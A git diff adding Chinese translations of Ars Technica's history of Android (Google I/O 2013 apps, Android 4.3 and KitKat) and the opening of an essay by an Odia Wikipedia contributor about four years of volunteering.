+via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/23/
+
+译者:[alim0x](https://github.com/alim0x) 校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
+
+[1]:http://arstechnica.com/gadgets/2013/09/balky-carriers-and-slow-oems-step-aside-google-is-defragging-android/
+[2]:http://arstechnica.com/information-technology/2013/05/hands-on-with-hangouts-googles-new-text-and-video-chat-architecture/
+[3]:https://developer.android.com/design/patterns/navigation-drawer.html
+[a]:http://arstechnica.com/author/ronamadeo
+[t]:https://twitter.com/RonAmadeo
diff --git a/translated/talk/The history of Android/24 - The history of Android.md b/translated/talk/The history of Android/24 - The history of Android.md
new file mode 100644
index 0000000000..71d1736a12
--- /dev/null
+++ b/translated/talk/The history of Android/24 - The history of Android.md
@@ -0,0 +1,83 @@
+安卓编年史
+================================================================================
+![漂亮的新 Google Play Music 应用,从电子风格转向完美契合 Play 商店的风格。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/Goooogleplaymusic.jpg)
+漂亮的新 Google Play Music 应用,从电子风格转向完美契合 Play 商店的风格。
+Ron Amadeo 供图
+
+在 I/O 大会推出的另一个应用更新是 Google Music 应用。音乐应用经过了完全的重新设计,最终摆脱了蜂巢中引入的蓝底蓝色调的设计。Play Music 的设计和几个月前发布的 Play 商店一致,有着响应式的白色卡片布局。Music 同时还是最早采用新抽屉导航样式的主要应用之一。谷歌还随新应用发布了 Google Play Music All Access,每月 10 美元的包月音乐订阅服务。Google Music 现在拥有订阅计划,音乐购买,以及云端音乐存储空间。这个版本还引入了“Instant Mix”,谷歌会在云端给相似的歌曲计算出一份歌单。
+
+![一个展示对 Google Play Games 支持的游戏。上面是 Play 商店游戏特性描述,登陆游戏触发的权限对话框,Play Games 通知,以及成就界面。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/gooooogleplaygames.jpg)
+一个展示对 Google Play Games 支持的游戏。上面是 Play 商店游戏特性描述,登陆游戏触发的权限对话框,Play Games 通知,以及成就界面。
+Ron Amadeo 供图
+
+谷歌还引入了“Google Play Games”,一个后端服务,开发者可以将其附加到游戏中。这项服务简单说就是安卓版的 Xbox Live 或苹果的 Game Center。开发者可以给游戏添加 Play Games 支持,这样就能通过使用谷歌的后端服务,更简单地集成成就,多人游戏,游戏匹配,用户账户以及云端存档到游戏中。
+
+Play Games 是谷歌在游戏方面推进的开始。就像单独的 GPS 设备,翻盖手机,以及 MP3 播放器,智能手机的生产者希望游戏设备能够变成智能手机的一个功能点。当你有部智能手机的时候你为什么还有买个任天堂 DS 或 PS Vita 呢?一个易于使用的多人游戏服务是这项计划的重要部分,我们仍能看到这个决定最后的成果。在今天,坊间都在传言谷歌和苹果有关于客厅游戏设备的计划。
+
+![Google Keep,谷歌自 Google Notebook 以来第一个笔记服务。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/goooglekeep.jpg)
+Google Keep,谷歌自 Google Notebook 以来第一个笔记服务。
+Ron Amadeo 供图
+
+毫无疑问,一些产品是赶在 Google I/O 大会发布之前及时开发完成的,[但主题演讲长达三个半小时][1],能涵盖的内容终归有限,一些产品在大会的发布上被略过了。Google I/O 大会的三天后,一切都清楚了,谷歌带来了 Google Keep,一个用于安卓和在线版的笔记应用。Keep 看起来很简单,就是一个用上了响应式 Google Now 风格设计的笔记应用。用户可以改变卡片的尺寸,从多栏布局改为单列视图。笔记可以由文本、清单、自动转文本的语音或者图片组成。笔记卡片可以拖动并在主界面重新组织,你甚至可以给笔记换个颜色。
+
+![Gmail 4.5,换上了新的导航抽屉设计,去掉了几个按钮并将操作栏合并到了抽屉里。](http://cdn.arstechnica.net/wp-content/uploads/2014/05/gmail.png)
+Gmail 4.5,换上了新的导航抽屉设计,去掉了几个按钮并将操作栏合并到了抽屉里。
+Ron Amadeo 供图
+
+在 I/O 大会之后,没有哪些应用不在谷歌的周期外更新里。2013 年 6 月,谷歌发布了新版设计的 Gmail。最显眼的变化就是一个月前 Google I/O 大会引入的新导航抽屉界面。最吸引眼球的变化是用上了 Google+ 资料图片来取代复选框。虽然复选框看起来被去掉了,它们其实还在那,点击邮件左边的图片就是了。
+
+![新谷歌地图,换上了全白的 Google-Now 风格主题。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/newmaps11.png)
+新谷歌地图,换上了全白的 Google-Now 风格主题。
+Ron Amadeo 供图
+
+一个月后,谷歌在 Play 商店发布了全新的谷歌地图。这是谷歌地图自冰淇淋三明治以来第一个经过细致地重新设计的版本。新版本完全适配了 Google Now 白色卡片审美,还大大减少了屏幕上显示的元素。新版谷歌地图似乎设计时有意使地图总是显示在屏幕上,你很难找到除了设置页面之外还能完全覆盖地图显示的选项。
+
+这个版本的谷歌地图看起来活在它自己的小小设计世界中。白色的搜索栏“浮动”在地图之上,地图显示部分在它旁边和上面都有。这和传统的操作栏设计有所不同。一般在应用左上角的导航抽屉,在这里是在左下角。这里的主界面没有向上按钮,应用图标,也没有浮动按钮。
+
+![新谷歌地图轻量化了许多,在一屏内能够显示更多的信息。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/newmaps21.png)
+新谷歌地图轻量化了许多,在一屏内能够显示更多的信息。
+Ron Amadeo 供图
+
+左边的图片显示的是点击了搜索栏后的效果(带键盘,这里关闭了)。过去谷歌在空搜索栏下面显示一个空页面,但在地图中,谷歌利用这些空间链接到新的“本地”页面。搜索结果页显示一般信息的结果,比如餐馆,加油站,以及景点。在结果页的底部是个列表,显示你的搜索历史和手动缓存部分地图的选项。
+
+右侧图片显示的是地点页面。上面地图 7.0 的截图里显示的地图不是略缩图,它是完整的地图视图。在新版的谷歌地图中,地点作为卡片浮动显示在主地图之上,地图重新居中显示该地点。向上滑动可以让卡片覆盖地图,向下滑动可以显示带有底部一小条结果的完整地图。如果该地点是搜索结果列表中的一个,左右滑动可以在结果之间切换。
+
+地点页面重新设计以显示更有用的信息概览。在第一页,新版添加了重要信息,比如地图上的位置,点评得分,以及点评数目。因为这是个手机,所以软件内可以直接拨打电话,电话号码的显示被认为是毫无意义的,被去掉了。旧版地点显示到那里的距离,新版谷歌地图显示到那里的时间,基于交通状况和偏好的交通方式——一个更加实用的衡量方式。新版还在中间放了个分享按钮,这使得通过即时通讯或短信协调的时候更加方便。
+
+### Android 4.3,果冻豆——早早支持可穿戴设备 ###
+
+如果谷歌没有在安卓 4.3 和安卓 4.2 之间通过 Play 商店发布更新的话,安卓 4.3 会是个不可思议的更新。如果新版 Play 商店,Gmail,地图,书籍,音乐,Hangouts 环聊,以及 Play Games 打包作为新版安卓的一部分,它将会作为有史以来最大的发布受到欢呼。虽然谷歌没必要延后新功能的发布。有了 Play 服务框架,只剩很少的部分需要系统更新,2013 年 7 月底谷歌发布了看似无关紧要的“安卓 4.3”。
+
+![安卓 4.3 通知访问权限界面的可穿戴设备选项。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/2014-03-28-12.231.jpg)
+安卓 4.3 通知访问权限界面的可穿戴设备选项。
+Ron Amadeo 供图
+
+谷歌也毫无疑问地认为 4.3 的重要性不高,将新版也叫做“果冻豆”(第三个叫果冻豆的版本了)。安卓 4.3 的新功能列表像是谷歌无法通过 Play 商店或谷歌 Play 服务更新的部分的细目清单,大部分包含了为开发者作出的底层架构改动。
+
+但许多新增功能似乎只为了一个目的——安卓 4.3 是谷歌对可穿戴计算支持的特洛伊木马。4.3 加入了低功耗蓝牙支持,使用很少的能耗将安卓和其它设备连接到一起并传输数据——可穿戴设备的必要特性。安卓 4.3 还添加了“通知访问权限”API,允许应用完全复制和控制通知面板。应用可以显示通知文本以及和用户操作一样地和通知交互——也就是点击操作按钮和消除通知。当你有个通知面板时从本机应用做这个操作没什么意义,但是在一个独立于你手机的设备上,复制通知面板的消息就显得很有用了。为数不多的接入的应用是 “Android Wear Preview(安卓可穿戴预览)”,使用了通知 API 驱动大部分的 Android Wear 界面。
+
+“4.3 是给可穿戴设备准备的”这个理论解释了 4.3 相对较少的新特性:它的推出是为了给 OEM 厂商时间去升级设备,为 [Android Wear][2] 的发布做准备。这个计划看起来起作用了。Android Wear 要求 安卓 4.3 及以上版本,安卓 4.3 已经发布很长时间了,大部分主要的旗舰设备都已经升级了。
+
+安卓并没有那么激动人心,但安卓从现在起的新版也不需要那么激动人心了。一切都变得那么模块化了,谷歌可以通过 Google Play 在它们完成时随时推送更新,不用再作为一个大系统更新来更新这么多组件。
+
+----------
+
+![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
+
+[Ron Amadeo][a] / Ron 是 Ars Technica 的评论编辑,专注于安卓系统和谷歌产品。他总是在追寻新鲜事物,还喜欢拆解事物,看看它们到底是怎么运作的。
+
+[@RonAmadeo][t]
+
+--------------------------------------------------------------------------------
+
+via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/24/
+
+译者:[alim0x](https://github.com/alim0x) 校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
+
+[1]:http://live.arstechnica.com/liveblog-google-io-2013-keynote/
+[2]:http://arstechnica.com/gadgets/2014/03/in-depth-with-android-wear-googles-quantum-leap-of-a-smartwatch-os/
+[a]:http://arstechnica.com/author/ronamadeo
+[t]:https://twitter.com/RonAmadeo
diff --git a/translated/talk/The history of Android/25 - The history of Android.md b/translated/talk/The history of Android/25 - The history of Android.md
new file mode 100644
index 0000000000..01b93c71a9
--- /dev/null
+++ b/translated/talk/The history of Android/25 - The history of Android.md
@@ -0,0 +1,71 @@
+安卓编年史
+================================================================================
+![LG 制造的 Nexus 5,奇巧(KitKat)的首发设备。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/nexus56.jpg)
+LG 制造的 Nexus 5,奇巧(KitKat)的首发设备。
+
+### Android 4.4,奇巧——更完美;更少的内存占用 ###
+
+谷歌安卓 4.4 的发布确实很讨巧。谷歌和[雀巢公司合作][1],新版系统的代号是“奇巧(KitKat)”,并且它是在 2013 年 10 月 31 日发布的,也就是万圣节。雀巢公司推出了限量版带安卓机器人的奇巧巧克力,它的包装也帮助新版系统推广,消费者有机会赢取一台 Nexus 7。
+
+一部新的 Nexus 设备也随奇巧一同发布,就是 Nexus 5。新旗舰拥有迄今最大的显示屏:一块五英寸,1920x1080 分辨率的 LCD 显示屏。除了更大尺寸的屏幕,LG——Nexus 5 的制造商——还将 Nexus 5 的机器大小控制得和 Galaxy Nexus 或 Nexus 4 差不多。
+
+Nexus 5 相对同时期的高端手机配置算是标准了,拥有 2.3Ghz 骁龙 800 处理器和 2GB 内存。手机再次在 Play 商店销售无锁版,相同配置的大多数手机价格都在 600 到 700 美元之间,但 Nexus 5 的售价仅为 350 美元。
+
+奇巧最重要的改进之一你并不能看到:显著减少的内存占用。对奇巧而言,谷歌齐心协力开始了降低系统和预装应用内存占用的努力,称作“Project Svelte”。经过了无数的优化工作和通过一个“低内存模式”(禁用图形开销大的特效),安卓现在可以在 340MB 内存下运行。低内存需求是件了不起的事,因为在发展中国家的设备——智能手机增长最快的市场——许多设备的内存仅有 512MB。冰淇淋三明治更高级的 UI 显著提高了对安卓设备的系统配置要求,这使得很多低端设备——甚至是新发布的低端设备——的安卓版本停留在姜饼。奇巧更低的配置需求意味着这些廉价设备能够跟上脚步。有了奇巧,谷歌希望完全消灭姜饼(写下本文时姜饼的市场占有率还在 20% 左右)。为了防止更低的系统需求还不够有效,甚至有报道称谷歌将[不再授权][2]谷歌应用给姜饼设备。
+
+除了给低端设备带来更现代版本的系统,Project Svelte 更低的内存需求同样对可穿戴设备也是个好消息。Google Glass [宣布][3]它会切换到这个更精简的系统,[Android Wear][4] 同样也运行在奇巧之上。安卓 4.4 带来的更低的内存需求以及 4.3 中的通知消息 API 和低功耗蓝牙支持给了可穿戴计算漂亮的支持。
+
+奇巧的亮点还有无数精心打磨过的核心系统界面,它们无法通过 Play 商店升级。系统界面,拨号盘,时钟还有设置都能看到升级。
+
+![奇巧在 Google Now 启动器下的透明系统栏。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/1homescreenz.png)
+奇巧在 Google Now 启动器下的透明系统栏。
+Ron Amadeo 供图
+
+奇巧不仅去掉了讨人厌的锁屏左右屏的线框——它还默认完全禁用了锁屏小部件!谷歌明显感觉到了多屏锁屏和锁屏主屏对新用户来说有点复杂,所以锁屏小部件现在需要从设置里启用。锁屏和时钟里不平衡的时间字体换成了一个对称的字重,看起来好看多了。
+
+在奇巧中,应用拥有将系统栏和状态栏透明的能力,显著地改变了系统的外观。系统栏和状态栏现在混合到壁纸和启用透明栏的应用中去了。这些栏还能通过新功能“沉浸”模式完全被应用隐藏。
+
+奇巧是“电子”科幻风格棺材上的最后一颗钉子,几乎完全移除了系统的蓝色痕迹。状态栏图标由蓝色变成中性的白色。主屏的状态栏和系统栏并不是完全透明的;它们有深色的渐变,这样在使用浅色壁纸的时候白色的图标还能轻易地识别出来。
+
+![Google Now 和文件夹的调整。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/nowfolders.png)
+Google Now 和文件夹的调整。
+Ron Amadeo 供图
+
+在 Nexus 5 上随奇巧到来的主屏实际上由 Nexus 5 独占了几个月,但现在任何 Nexus 设备都能拥有它了。新的主屏叫做“Google Now Launcher”,它实际上是[谷歌搜索应用][5]。是的,谷歌搜索从一个简单的搜索框成长到了整个主屏幕,并且在奇巧中,它涉及了壁纸,图标,应用抽屉,小部件,主屏设置,Google Now,当然,还有搜索框。由于搜索现在运行在整个主屏幕,任何时候只要打开了主屏并且屏幕是点亮的,就可以通过说“OK Google”激活语音命令。在搜索栏有引导用户说出“OK Google”的文本,在几次使用后这个介绍会隐去。
+
+Google Now 的集成度现在更高了。除了通常的系统栏上滑激活,Google Now 还占据了最左侧的主屏。新版还引入了一些设计上的调整。谷歌的 logo 移到了搜索栏内,整个顶部区域更紧凑了。显示更多卡片的设计被去除了,新添加的一组底部按钮指向备忘录,自定义选项,以及一个更多操作按钮,里面有设置,反馈,以及帮助。因为 Google Now 是主屏幕的一部分,所以它也拥有透明的系统栏和状态栏。
+
+透明以及让系统的特定部分“更明亮”是奇巧的设计主题。黑色调通过透明化从状态栏和系统栏移除了,文件夹的黑色背景也换为了白色。
+
+![新的,更加干净的应用列表,以及完整的应用阵容。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/apps.png)
+新的,更加清爽的应用列表,以及完整的应用阵容。
+Ron Amadeo 供图
+
+奇巧的图标阵容相对 4.3 有显著的变化。更戏剧化地说,这是一场大屠杀,谷歌从 4.3 的配置中移除了七个图标。谷歌 Hangouts 现在能够处理短信,所以信息应用被去除了。Hangouts 同时还接手了 Google Messenger 的职责,所以它的图标也不见了。Google Currents 不再作为默认应用预装,因为它不久后就会被终结——和它一起的还有 Google Play Magazines(Play 杂志),取代它们的是 Google Play Newsstand(Play 报刊亭)。谷歌地图被打回一个图标,这意味着本地和导航的快捷方式被去掉了。难以理解的 Movie Studio 也被去除了——谷歌肯定已经意识到了没人想在手机上剪辑电影。有了主屏的“OK Google”关键词检测,语音搜索图标的呈现就显得多余了,因而将其移除。令人沮丧的是,没人用的新闻和天气应用还在。
+
+有个新应用“Photos(相片)”——实际上是 Google+ 的一部分——接手了图片管理的工作。在 Nexus 5 上,相册和 Google+ 相片十分相似,但在 Google Play 版设备上更新版的奇巧中,相册已经完全被 Google+ 相片所取代。Play Games 是谷歌的后端多用户游戏服务——谷歌版的 Xbox Live 或苹果的 Game Center。Google Drive,已经在 Play 商店存在数年的应用,终于成为了内置应用。谷歌 2012 年 6 月收购的 Quickoffice 也进入了内置应用阵容。Drive 可以打开 Google 文档,Quickoffice 可以打开微软 Office 文档。如果细细追究起来,在大多数奇巧中包含了两个文档编辑应用和两个相片编辑应用。
+
+----------
+
+![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
+
+[Ron Amadeo][a] / Ron 是 Ars Technica 的评论编辑,专注于安卓系统和谷歌产品。他总是在追寻新鲜事物,还喜欢拆解事物,看看它们到底是怎么运作的。
+
+[@RonAmadeo][t]
+
+--------------------------------------------------------------------------------
+
+via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/25/
+
+译者:[alim0x](https://github.com/alim0x) 校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
+
+[1]:http://arstechnica.com/gadgets/2013/09/official-the-next-edition-of-android-is-kitkat-version-4-4/
+[2]:http://www.androidpolice.com/2014/02/10/rumor-google-to-begin-forcing-oems-to-certify-android-devices-with-a-recent-os-version-if-they-want-google-apps/
+[3]:http://www.androidpolice.com/2014/03/01/glass-xe14-delayed-until-its-ready-promises-big-changes-and-a-move-to-kitkat/
+[4]:http://arstechnica.com/gadgets/2014/03/in-depth-with-android-wear-googles-quantum-leap-of-a-smartwatch-os/
+[5]:http://arstechnica.com/gadgets/2013/11/google-just-pulled-a-facebook-home-kitkats-primary-interface-is-google-search/
+[a]:http://arstechnica.com/author/ronamadeo
+[t]:https://twitter.com/RonAmadeo
diff --git a/translated/talk/The history of Android/26 - The history of Android.md b/translated/talk/The history of Android/26 - The history of Android.md
new file mode 100644
index 0000000000..2abd7a9a70
--- /dev/null
+++ b/translated/talk/The history of Android/26 - The history of Android.md
@@ -0,0 +1,87 @@
+安卓编年史
+================================================================================
+![新的“添加到主屏幕”界面无疑受到了蜂巢的启发。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/homesetupthrowback.png)
+新的“添加到主屏幕”界面无疑受到了蜂巢的启发。
+Ron Amadeo 供图
+
+奇巧的主屏幕配置界面漂亮地对蜂巢进行了复古。在有巨大的 10 英寸屏幕的蜂巢平板上(上方右侧图片),长按主屏背景会向你展现一个所有主屏幕的缩放视图。可以从下面的小部件抽屉里将它们拖放到任意主屏上——这很方便。在将蜂巢的界面带到手机上时,从安卓 4.0 直到 4.3,谷歌都跳过了这个设计,把它留给了大屏幕设备,在手机上长按后只显示一个选项列表(中间的图片)。
+
+但在奇巧上,谷歌最终给出了解决方案。在长按后,4.4 呈现一个略微缩放的视图——你可以看到当前主屏以及它左右侧的屏幕。点击“小部件”按钮会打开一个小部件略缩图的完整列表,但是长按一个小部件后,你会回到缩放视图,并且你可以在主屏页面之间滚动,将图标放在你想要的位置。将图标或者小部件拖动过最右侧的主屏页面,你可以创建一个新的主屏页面。
+
+![联系人和去掉所有蓝色痕迹的键盘。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/RIP33B5E5.png)
+联系人和去掉所有蓝色痕迹的键盘。
+Ron Amadeo 供图
+
+奇巧是电子风格设计的完结。在系统的大多数部分,剩下的蓝色高亮都被换成了灰色。在联系人应用中,头部和联系人列表字母分割线的蓝色都移除掉了。图片的位置换了一侧,底栏变成了浅灰色以和顶部相称。几乎将蓝色渗透进每个应用的键盘,现在是灰底灰色灰高亮。这可不是件坏事。应用应该允许有它们自己的配色方案——在键盘上强迫存在潜在的颜色冲突可不是个好设计。
+
+![前三张是奇巧的拨号盘,最后一张是 4.3 的。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/phone.png)
+前三张是奇巧的拨号盘,最后一张是 4.3 的。
+Ron Amadeo 供图
+
+谷歌完全重制了奇巧中的拨号,创造了一个疯狂的设计,改变了用户对手机的思考方式。实际上新版拨号中的数字都被尽可能地隐藏了——在首屏上甚至没有拨号盘。打电话的主要界面现在是个搜索栏!如果你想给你的联系人打电话,只要在搜索栏输入他的名字;如果你想给一个公司打电话,只要输入公司的名字,拨号会通过谷歌地图庞大的数据库找到号码。它工作得令人难以置信的好,这是只有谷歌才能完成的事情。
+
+如果搜索不是你的菜的话,应用还会智能地显示通话记录列表,最常联系人,还有指向所有联系人的链接。底部的链接指向你的通话记录,传统的拨号盘,以及常规的更多操作按钮,包含一个设置页面。
+
+![Office 相关:新的内置应用 Google Drive,以及打印支持。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/googledrive-and-printing.png)
+Office 相关:新的内置应用 Google Drive,以及打印支持。
+Ron Amadeo 供图
+
+在奇巧中 Google Drive 终于作为内置应用包含了进来,令人惊奇的是这居然用了这么长时间。Drive 允许用户创建和编辑 Google Docs 表格和文档,用相机扫描文档并作为 PDF 上传,或者查看(不能编辑)演示文稿。Drive 的设计十分现代,侧面拥有滑出式导航抽屉,并且是 Google Now 风格卡片式设计。
+
+为了有更多的移动办公乐趣,奇巧包含了系统级打印框架。在设置的底部有“打印”设置界面,任何打印机 OEM 厂商都可以为它写个插件。谷歌云打印自然是首批支持者之一。只要你的打印机和云打印相连接,无论是本地或通过一台装有 Chrome 浏览器的电脑,你都可以借助网络进行打印。应用同样也需要支持打印框架。点击 Google Drive 里的“i”按钮会显示文档信息,并且给你打印的选项。就像桌面系统那样,会弹出一个设置对话框,有打印份数,纸张尺寸,以及页面选择等选项。
+
+![Google+ 应用的“相片”部分,它取代了相册。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/that-is-one-dead-gallery.png)
+Google+ 应用的“相片”部分,它取代了相册。
+Ron Amadeo 供图
+
+Google+ 相片和相册最初都在 Nexus 5 上随附,但在 Google Play 设备稍晚版本的奇巧上,相册被砍掉了,Google+ 完全接手了相片管理。新应用的主题从深色变成了浅色,Google+ 相片还带来了现代的导航抽屉设计。
+
+安卓一直以来都有即时上传功能,它会自动备份所有图片到谷歌的云存储,开始是 Picasa 后来是 Google+。G+ 相片相比相册最大的好处是它可以管理那些云端存储的图片。图片右下角的云图标指示备份状态,它会从右到左地填满来指示正在上传。G+ 相片带来了它自己的照片编辑器,还有许多其它的 Google+ 图片功能,比如高亮,自动美化,当然,还有分享到 Google+。
+
+![时钟应用的调整,添加了一个闹钟页面并修改了时间输入框。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/clocks.png)
+时钟应用的调整,添加了一个闹钟页面并修改了时间输入框。
+Ron Amadeo 供图
+
+谷歌将 4.2 引入的优秀时间选择器换成了一个奇怪的时钟界面,操作起来比旧界面更慢了也更不精确了。首先是个可以选择小时的单指针时钟,然后显示的是另一个选择分钟的单指针时钟。选择的时候要转动分针或点击数字,这让用用户很难选择不是整五分钟的时间增量。不像之前的时间选择器需要选择一个时间段,这里默认时间段是 AM(重复一下,这样设置的时候容易不小心偏差 12 小时)。
+
+### 今日安卓无处不在 ###
+
+![](http://cdn.arstechnica.net/wp-content/uploads/2014/05/android-everywhere2.png)
+图片来自 Google/Sony/Motorola/Ron Amadeo
+
+安卓从一家搜索引擎公司做出的古怪黑莓仿制品起步,一步一步成长为科技巨头谷歌旗下世界上最流行的操作系统。安卓已经成为谷歌实际上的消费者操作系统,它驱动着手机、平板、Google Glass、Google TV,甚至更多。[它的一部分][1]甚至还用到了 Chromecast 中。在未来,谷歌还会将 [Android Wear][2] 带到手表和可穿戴设备上,[开放汽车联盟][3]要将安卓带到汽车上。不久后,谷歌还会再次进军客厅,带来 [Android TV][4]。这个系统对谷歌是如此重要的支柱,原本应该覆盖全公司产品的大会活动,比如 Google I/O,俨然成为了安卓发布派对。
+
+![上排:谷歌 Play 内容商店。下排:谷歌 Play 应用。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/2014-03-30-03.08.jpg)
+上排:谷歌 Play 内容商店。下排:谷歌 Play 应用。
+Ron Amadeo 供图
+
+移动产业曾经的的丑小鸭脱胎换骨,它的用户界面还[赢得了设计奖项][5]。像 Google Now 一样的设计风格影响了整个公司的产品,甚至连像搜索,Google+,Youtube,以及地图这样的桌面站点都加入了卡片式设计中。设计也在不断地演进。谷歌下一步[统一设计][6]的计划不仅是面对安卓,也包括了所有的产品。谷歌的目标是让你不管在安卓,还是桌面浏览器,或是一个手表上,使用像 Gmail 这样的服务时都能有一样的体验。
+
+谷歌将很多安卓的组件转移到 Play 商店,这样版本发布就越来越不重要了。谷歌决定了解决运营商和 OEM 厂商更新问题的最佳途径,就是完全绕开这些绊脚石。从这里开始,在一个安卓更新里除了核心底层变动外就没什么内容了——但是更多的 API 被加入了谷歌 Play 服务。如果你只看版本更新的话,相对安卓高峰期 2.5 个月的发布周期来说开发已经放缓了。但实际情况是谷歌现在可以持续将改进推送到 Play 商店,从周期发布变成了永无止境,有些微妙的更新流。
+
+每天 150 万台设备激活,安卓除了增长就是增长。在未来,安卓会是从手机和平板到汽车和手表的领军者,奇巧更低的系统配置要求也会让发展中国家的手机价格更低。结果呢?越来越多的人会来到线上。对那里的大多数人来说,安卓不止是他们的手机,也是他们首要的计算设备。随着安卓在众多领域为谷歌攻城略地,这个从一次小小收购而来的系统,逐渐成长为了谷歌最重要的产品。
+
+----------
+
+![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
+
+[Ron Amadeo][a] / Ron 是 Ars Technica 的评论编辑,专注于安卓系统和谷歌产品。他总是在追寻新鲜事物,还喜欢拆解事物,看看它们到底是怎么运作的。
+
+[@RonAmadeo][t]
+
+--------------------------------------------------------------------------------
+
+via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/26/
+
+译者:[alim0x](https://github.com/alim0x) 校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
+
+[1]:http://blog.gtvhacker.com/2013/chromecast-exploiting-the-newest-device-by-google/
+[2]:http://arstechnica.com/gadgets/2014/03/in-depth-with-android-wear-googles-quantum-leap-of-a-smartwatch-os/
+[3]:http://arstechnica.com/information-technology/2014/01/open-automotive-alliance-aims-to-bring-android-inside-the-car/
+[4]:http://arstechnica.com/gadgets/2014/04/documents-point-to-android-tv-googles-latest-bid-for-the-living-room/
+[5]:http://userexperienceawards.com/uxa2012/
+[6]:http://arstechnica.com/gadgets/2014/04/googles-next-design-challenge-unify-app-design-across-platforms/
+[a]:http://arstechnica.com/author/ronamadeo
+[t]:https://twitter.com/RonAmadeo
diff --git a/translated/talk/my-open-source-story/20160415 A four year, action-packed experience with Wikipedia.md b/translated/talk/my-open-source-story/20160415 A four year, action-packed experience with Wikipedia.md
new file mode 100644
index 0000000000..b2be6a7a01
--- /dev/null
+++ b/translated/talk/my-open-source-story/20160415 A four year, action-packed experience with Wikipedia.md
@@ -0,0 +1,74 @@
+在维基激动人心的四年
+=======================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/wikipedia_checkuser_lead.jpg?itok=4lVDjSSM)
+
+
+我自认为是个奥迪亚语维基人。我通过撰写文章和纠正有错误的文章,向维基百科和维基文库等很多维基项目贡献[奥迪亚语][1](印度[奥里萨邦][2]的主要语言)的知识,我也为用印地语和英语写的维基文章做贡献。
+
+![](https://opensource.com/sites/default/files/resize/1st_day_at_odia_wikipedia_workshop_image_source_facebook-200x133.jpg)
+
+我对维基的爱,从我十年级考试(类似于美国 10 年级学生的年级考试)之后看到的英文维基文章[孟加拉解放战争][3]开始。一不小心,我打开了印地语维基文章的链接,并且开始阅读它。在文章左边有用奥迪亚语写的链接,我点击了一下,打开了一篇奥迪亚语维基上的 [ଭାରତ/Bhārat][4] 文章。发现用母语写的维基让我很激动!
+
+![](https://opensource.com/sites/default/files/resize/introducing_wikipedia_at_google_io_image_by_gdg_bhubaneswar-251x166.png)
+
+一个邀请读者参加 2014 年 4 月 1 日第二次布巴内斯瓦尔的研讨会的标语引起了我的好奇。我过去从来没有为维基做过贡献, 只用它搜索过, 我并不熟悉开源和社区贡献流程。加上,我只有 15 岁。我注册了。在研讨会上有很多语言爱好者,我是中间最年轻的一个。尽管我害怕我父亲还是鼓励我去参与。他起了非常重要的作用—他不是一个维基媒体人,和我不一样,但是他的鼓励给了我改变奥迪亚维基的动力和参加社区活动的勇气。
+
+我相信奥迪亚语的语言和文学需要纠正很多错误的观念、填补很多知识缺口,所以,我帮助组织关于奥迪亚维基的活动和研讨会,完成的工作如下:
+
+* 在奥迪亚维基上发起了 3 次主要的 edit-a-thon:2015 年妇女节、2016 年妇女节,以及 [Nabakalebara edit-a-thon 2015][5]
+* 在全印度发起了征集[檀车节][6]图片的比赛
+* 在谷歌的两大事件([谷歌I/O大会扩展][7]和谷歌开发节)中代表奥迪亚维基
+* 在 2015 年的 [Perception][8] 活动和第一次 [Open Access India][9] 会议上发言
+
+![](https://opensource.com/sites/default/files/resize/bengali_wikipedia_10th_anniversary_cc-by-sa4.0_biswaroop_ganguly-251x166.jpg)
+
+直到去年之前,我都只是在编辑维基项目。2015 年 1 月,当我出席[孟加拉语维基百科的十周年庆典][10]时,[互联网和社会中心][12]主任 [Vishnu][11] 邀请我参加[培训培训师][13]计划。我受到启发,开始扩展奥迪亚维基,为 [GLAM][14] 活动举办聚会并培训新的维基人。这些经验告诉我,作为一个贡献者该如何为社区工作。
+
+[Ravi][15],时任维基媒体的负责人,在我的旅程中也发挥了重要作用。他非常信任我,让我参与 [Wiki Loves Food][16](维基共享资源上的公开摄影比赛),并参与组织 [2016 印度维基会议][17]。在 2015 年的 Wiki Loves Food 活动期间,我的团队向维基共享资源添加了 10,000+ 张采用 CC BY-SA 协议的图片。Ravi 进一步坚定了我的投入,他和我分享了很多关于维基媒体运动的信息,以及他自己在[奥迪亚维基百科 13 周年][18]时的经历。
+
